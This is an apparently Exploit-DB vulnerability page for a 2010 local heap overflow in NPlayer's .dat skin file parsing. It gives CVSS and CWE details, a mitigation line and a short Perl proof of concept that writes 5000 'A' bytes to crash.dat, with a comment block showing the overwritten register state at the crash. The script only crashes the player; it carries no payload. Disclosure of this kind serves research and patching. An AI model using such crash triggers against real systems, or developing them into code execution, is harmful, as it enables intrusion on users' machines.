NPlayer (.dat Skin File) Local Heap Overflow PoC

vendor:

NPlayer

by:

Rehan Ahmed

7,8

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: NPlayer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP SP2

2010

NPlayer (.dat Skin File) Local Heap Overflow PoC

A local heap overflow vulnerability exists in NPlayer when a specially crafted .dat skin file is opened. This could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient boundary checks when processing the .dat skin file. An attacker can exploit this vulnerability by enticing a user to open a malicious .dat skin file.

Mitigation:

Update to the latest version of NPlayer.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC
#Date:13/01/2010
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
########################################################################################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#######################################################################################
########################################################################################
my $boom="\x41" x 5000;
my $file="crash.dat";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";
########################################################################################